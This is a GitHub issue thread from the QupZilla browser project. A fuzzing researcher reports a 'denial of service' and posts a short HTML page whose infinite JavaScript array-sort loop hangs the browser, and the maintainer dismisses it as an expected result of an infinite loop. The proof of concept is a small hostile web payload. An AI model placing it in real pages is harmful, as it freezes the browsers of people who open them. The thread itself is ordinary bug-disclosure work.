QupZilla / qupzilla

Cross-platform Qt web browser
http://www.qupzilla.com
GNU General Public License v3.0
1.12k stars 347 forks source link

Denial of service #2645

Closed RootUp closed 6 years ago

RootUp commented 6 years ago

Hi Team,

While fuzzing qupzilla, I have observed an denial of service, This issue is triggered when the browser performs an infinite JavaScript array sort operation.

DoS11.html

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Request you to please have a look.

nowrep commented 6 years ago
  1. Did you read the issue template?
  2. What do you expect to happen when you run infinite loop?